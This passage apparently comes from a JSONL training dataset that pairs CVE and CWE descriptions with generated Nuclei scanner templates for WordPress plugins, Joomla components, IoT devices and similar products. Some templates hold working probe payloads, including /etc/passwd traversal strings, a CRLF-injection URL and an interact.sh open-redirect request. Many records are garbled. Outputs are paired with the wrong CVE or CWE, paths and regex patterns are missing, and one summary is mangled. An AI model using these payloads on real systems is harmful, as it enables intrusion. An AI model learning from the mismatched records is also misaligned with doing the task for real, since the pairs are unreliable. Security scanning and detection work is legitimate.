Cross-Site Scripting which could be used against high privilege users such as admin\n tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-37979"} +{"instruction": "Generate a Nuclei template for CVE-2023-2796", "input": "Title: Missing Authorization in myeventon eventon\nSummary: The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.\nVulnerability Type: Missing Authorization\nSeverity: medium\nAffected Products: myeventon eventon\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-0235\n\ninfo:\n name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure\n author: ProjectDiscoveryAI\n severity: medium\n description: The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users\" \n matchers:\n - type: word\n words:\n - \"@\" \n - \"status\":\"good\" \n - \"value=\" \n - \"\"content\":\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-2796"} +{"instruction": "Generate a Nuclei template for CVE-2022-42889", "input": "Title: Code Injection in apache commons_text and others\nSummary: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: apache commons_text, netapp bluexp, juniper security_threat_response_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-42889\n\ninfo:\n name: Text4Shell - Remote Code Execution\n author: mordavid,princechaddha\n severity: critical\n description: Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n tags: cve,cve2022,rce,oast,text4shell,dast,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: regex\n part: interactsh_request", "category": "cve", "severity": "critical", "id": "CVE-2022-42889"} +{"instruction": "Generate a Nuclei template for CVE-2024-11972", "input": "Title: Unknown Vulnerability in themehunk hunk_companion\nSummary: The Hunk Companion WordPress plugin before 1.9.0 does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary Hunk Companion WordPress plugin before 1.9.0 from the WordPress.org repo, including vulnerable Hunk Companion WordPress plugin before 1.9.0 that have been closed.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: themehunk hunk_companion\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11972\n\ninfo:\n name: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation\n author: s4e-io\n severity: critical\n description: The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.\n tags: cve,cve-2024,wordpress,wp,wp-plugin,hunk-companion,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"\\\"https:\\\\\\/\\\\\\/\" \n part: body_2\n - type: word\n words:\n - \"application/json\" \n part: content_type_2\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-11972"} +{"instruction": "Generate a Nuclei template for: BinaryEdge API Test", "input": "Title: BinaryEdge API Test\nSummary: BinaryEdge API Test. BinaryEdge combines Machine Learning and Cybersecurity techniques in a custom built platform to scan, acquire and classify public Internet data. This platform scans the entire public Internet space and creates real-time threat intelligence streams and reports about your company.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-binaryedge\n\ninfo:\n name: BinaryEdge API Test\n author: 0ri2N\n severity: info\n description: BinaryEdge combines Machine Learning and Cybersecurity techniques in a custom built platform to scan, acquire and classify public Internet data. This platform scans the entire public Internet space and creates real-time threat intelligence streams and reports about your company.\n tags: recon,binaryedge,token-spray\n\nhttp:\n - method: GET\n path:\n - \"https://api.binaryedge.io/v2/user/subscription\" \n matchers:\n - type: word\n words:\n - \"\"subscription\"\" \n - \"\"requests_left\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-binaryedge"} +{"instruction": "Generate a Nuclei template for: Nginx Default Test Page", "input": "Title: Nginx Default Test Page\nSummary: Nginx Default Test Page. Tags: tech, nginx, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: default-nginx-page\n\ninfo:\n name: Nginx Default Test Page\n author: dhiyaneshDk\n severity: info\n description: Nginx Default Test Page\n tags: tech,nginx,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<title>Welcome to nginx!\" \n part: body", "category": "generic", "severity": "info", "id": "default-nginx-page"} +{"instruction": "Generate a Nuclei template for: Kong Security Checks", "input": "Title: Kong Security Checks\nSummary: Kong Security Checks. A simple workflow that runs all Kong related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: kong-workflow\n\ninfo:\n name: Kong Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Kong related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "kong-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2023-36289", "input": "Title: Cross-Site Scripting (XSS) in webkul qloapps\nSummary: An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: webkul qloapps\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-36289\n\ninfo:\n name: Webkul QloApps 1.6.0 - Cross-site Scripting\n author: theamanrawat\n severity: medium\n description: An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"onmouseover=alert(document.domain)\" \n - \"hasConfirmation\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-36289"} +{"instruction": "Generate a Nuclei template for: Datadog Login Check", "input": "Title: Datadog Login Check\nSummary: Datadog Login Check. Checks for a valid datadog account.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: datadog-login-check\n\ninfo:\n name: Datadog Login Check\n author: parthmalhotra,pdresearch\n severity: critical\n description: Checks for a valid datadog account.\n tags: cloud,creds-stuffing,login-check,datadog,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Set-Cookie: dogweb=\" \n part: header\n - type: status\n status:\n - 302", "category": "generic", "severity": "critical", "id": "datadog-login-check"} +{"instruction": "Generate a Nuclei template for: Apollo Sandbox UI - Exposed", "input": "Title: Apollo Sandbox UI - Exposed\nSummary: Apollo Sandbox UI - Exposed. Detects the Apollo Sandbox developer interface exposed in production environments, which could facilitate schema discovery or testing by unauthorized users.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: apollo-sandbox-ui-exposed\n\ninfo:\n name: Apollo Sandbox UI - Exposed\n author: Hamza Sahin\n severity: low\n description: Detects the Apollo Sandbox developer interface exposed in production environments, which could facilitate schema discovery or testing by unauthorized users.\n tags: apollo,misconfig,exposure,graphql,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "low", "id": "apollo-sandbox-ui-exposed"} +{"instruction": "Generate a Nuclei template for: AceNet AceReporter Report Panel - Detect", "input": "Title: AceNet AceReporter Report Panel - Detect\nSummary: AceNet AceReporter Report Panel - Detect. Tags: panel, login, acenet\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: acenet-panel\n\ninfo:\n name: AceNet AceReporter Report Panel - Detect\n author: DhiyaneshDk\n severity: info\n description: AceNet AceReporter Report Panel - Detect\n tags: panel,login,acenet,acereporter,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php\" \n matchers:\n - type: word\n words:\n - \"Welcome to Reporter\" \n - \"Login @ Reporter\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "acenet-panel"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: global-domains-lfi\n\ninfo:\n name: Global Domains International - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Global Domains International is vulnerable to local file inclusion.\n tags: globaldomains,lfi,traversal,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: solarwinds-orion\n\ninfo:\n name: SolarWinds Orion Login Panel - Detect\n author: puzzlepeaches\n severity: info\n description: SolarWinds Orion login panel was detected.\n tags: panel,solarwinds,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Orion/Login.aspx\" \n matchers:\n - type: word\n words:\n - \"SolarWinds Orion\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Ensure NIS Client is Not Installed", "input": "Title: Ensure NIS Client is Not Installed\nSummary: Ensure NIS Client is Not Installed. The nis package provides the Network Information Service client, which is insecure and deprecated.If not explicitly required, it should be removed to reduce the system\u2019s attack surface.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: nis-client\n\ninfo:\n name: Ensure NIS Client is Not Installed\n author: Th3l0newolf\n severity: info\n description: The nis package provides the Network Information Service client, which is insecure and deprecated.If not explicitly required, it should be removed to reduce the system\u2019s attack surface.\n tags: cis,local,cisecurity,audit,linux,ubuntu,nis\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "nis-client"} +{"instruction": "Generate a Nuclei template for CVE-2022-28923", "input": "Title: Vulnerability (CWE-601) in caddyserver caddy\nSummary: Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: caddyserver caddy\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-28923\n\ninfo:\n name: Caddy 2.4.6 - Open Redirect\n author: Sascha Brendel,DhiyaneshDk\n severity: medium\n description: Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,redirect,caddy,webserver,caddyserver,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2022-28923"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Google Clients1", "input": "Title: Content-Security-Policy Bypass - Google Clients1\nSummary: Content-Security-Policy Bypass - Google Clients1. Tags: xss, csp-bypass, google-clients1\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: google-clients1-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Google Clients1\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Google Clients1\n tags: xss,csp-bypass,google-clients1,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"google.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "google-clients1-csp-bypass"} +{"instruction": "Generate a Nuclei template for: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection", "input": "Title: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\nSummary: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wordfence\n\ninfo:\n name: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\n author: ricardomaia\n severity: info\n description: Wordfence Security \u2013 Firewall, Malware Scan, and Login Security Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wordfence/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wordfence"} +{"instruction": "Generate a Nuclei template for CVE-2023-6655", "input": "Title: SQL Injection in hrp2000 e-hr\nSummary: A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: hrp2000 e-hr\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6655\n\ninfo:\n name: Hongjing e-HR 2020 - SQL Injection\n author: pussycat0x\n severity: high\n description: A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.\n tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl", "category": "cve", "severity": "high", "id": "CVE-2023-6655"} +{"instruction": "Generate a Nuclei template for CVE-2021-31602", "input": "Title: Authentication Bypass in hitachi vantara_pentaho and others\nSummary: An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\nVulnerability Type: Authentication Bypass\nSeverity: medium\nAffected Products: hitachi vantara_pentaho, hitachi vantara_pentaho_business_intelligence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-31602\n\ninfo:\n name: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass\n author: pussycat0x\n severity: high\n description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js\" \n - \"{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"Anonymous\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-31602"} +{"instruction": "Generate a Nuclei template for CVE-2024-36857", "input": "Title: Vulnerability (CWE-31) in homebrew jan\nSummary: Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.\nVulnerability Type: Vulnerability (CWE-31)\nSeverity: high\nAffected Products: homebrew jan\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-36857\n\ninfo:\n name: Jan v0.4.12 'readFileSync' - Path Traversal\n author: Yusuf Amr\n severity: high\n description: Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.\n tags: cve,cve2024,jan,lfi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n condition: or\n - type: word\n words:\n - \"text/plain\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-36857"} +{"instruction": "Generate a Nuclei template for: HYPERPLANNING Login Panel - Detect", "input": "Title: HYPERPLANNING Login Panel - Detect\nSummary: HYPERPLANNING Login Panel - Detect. HYPERPLANNING products was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: hyperplanning-panel\n\ninfo:\n name: HYPERPLANNING Login Panel - Detect\n author: righettod\n severity: info\n description: HYPERPLANNING products was detected.\n tags: panel,hyperplanning,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "hyperplanning-panel"} +{"instruction": "Generate a Nuclei template for CVE-2022-0864", "input": "Title: Cross-Site Scripting (XSS) in updraftplus updraftplus\nSummary: The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.22.9 does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: updraftplus updraftplus\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-0864\n\ninfo:\n name: UpdraftPlus < 1.22.9 - Cross-Site Scripting\n author: DhiyaneshDk\n severity: medium\n description: The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n - \"Existing backups\" \n part: body_2\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-0864"} +{"instruction": "Generate a Nuclei template for: Zhiyuan OA Session Leak", "input": "Title: Zhiyuan OA Session Leak\nSummary: Zhiyuan OA Session Leak. A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: zhiyuan-oa-session-leak\n\ninfo:\n name: Zhiyuan OA Session Leak\n author: pikpikcu\n severity: medium\n description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.\n tags: zhiyuan,leak,disclosure,seeyon,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "zhiyuan-oa-session-leak"} +{"instruction": "Generate a Nuclei template for CVE-2021-31249", "input": "Title: Vulnerability (CWE-74) in chiyu-tech bf-430_firmware and others\nSummary: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.\nVulnerability Type: Vulnerability (CWE-74)\nSeverity: medium\nAffected Products: chiyu-tech bf-430_firmware, chiyu-tech bf-431_firmware, chiyu-tech bf-450m_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-31249\n\ninfo:\n name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection\n author: geeknik\n severity: medium\n description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY\" \n matchers:\n - type: word\n words:\n - \"Location: setting.htm\" \n - \"\" \n part: header\n condition: and\n - type: status\n status:\n - 302", "category": "cve", "severity": "medium", "id": "CVE-2021-31249"} +{"instruction": "Generate a Nuclei template for: NIS Service Should Be Disabled", "input": "Title: NIS Service Should Be Disabled\nSummary: NIS Service Should Be Disabled. Evaluated the status of NIS service daemons on the system. Active NIS services could have permitted unauthorized users to escalate privileges or access sensitive account information, posing a significant security risk.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: linux-nis-service\n\ninfo:\n name: NIS Service Should Be Disabled\n author: songyaeji\n severity: high\n description: Evaluated the status of NIS service daemons on the system. Active NIS services could have permitted unauthorized users to escalate privileges or access sensitive account information, posing a significant security risk.\n tags: linux,local,audit,kisa,compliance\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "linux-nis-service"} +{"instruction": "Generate a Nuclei template for CVE-2010-0942", "input": "Title: Path Traversal in jvideodirect com_jvideodirect\nSummary: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: jvideodirect com_jvideodirect\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-0942\n\ninfo:\n name: Joomla! Component com_jvideodirect - Directory Traversal\n author: daffainfo\n severity: medium\n description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-0942"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cypress-web-config\n\ninfo:\n name: Cypress Oxygen Configuration Page - Detect\n author: tess\n severity: info\n description: Cypress Oxygen configuration page was detected.\n tags: exposure,cypress,pendinginstallvzw,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"PendingInstallVZW - Web Page Configuration\" \n - \"alt=\"Cypress Oxygen-3\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Unencrypted Passwords to SMB Servers Allowed", "input": "Title: Unencrypted Passwords to SMB Servers Allowed\nSummary: Unencrypted Passwords to SMB Servers Allowed. Verifies if the system allows sending unencrypted passwords to third-party SMB servers, which is a security risk.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: smb-allow-unencrypted-passwords\n\ninfo:\n name: Unencrypted Passwords to SMB Servers Allowed\n author: princechaddha\n severity: high\n description: Verifies if the system allows sending unencrypted passwords to third-party SMB servers, which is a security risk.\n tags: smb,password,unencrypted,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "smb-allow-unencrypted-passwords"} +{"instruction": "Generate a Nuclei template for CVE-2014-10037", "input": "Title: Path Traversal in domphp domphp\nSummary: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: domphp domphp\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-10037\n\ninfo:\n name: DomPHP 0.83 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.\n tags: cve2014,cve,lfi,edb,domphp,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2014-10037"} +{"instruction": "Generate a Nuclei template to detect file.name", "input": "Title: file.name (CWE-44)\nSummary: The product accepts path input in the form of internal dot ('file.ordir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.\nVulnerability Type: file.name\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: akamai-s3-cache-poisoning\n\ninfo:\n name: Akamai/Amazon S3 - Cache Poisoning\n author: DhiyaneshDk\n severity: high\n description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cache,poisoning,xss,akamai,s3,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-44"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: istat-panel-detect\n\ninfo:\n name: Abbott i-STAT Login Panel - Detect\n author: princechaddha\n severity: info\n description: Abbott i-STAT login panel was detected.\n tags: panel,abbott,istat,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Abbott Point of Care Inc. i-STAT\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2022-36883", "input": "Title: Missing Authorization in jenkins git\nSummary: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit.\nVulnerability Type: Missing Authorization\nSeverity: high\nAffected 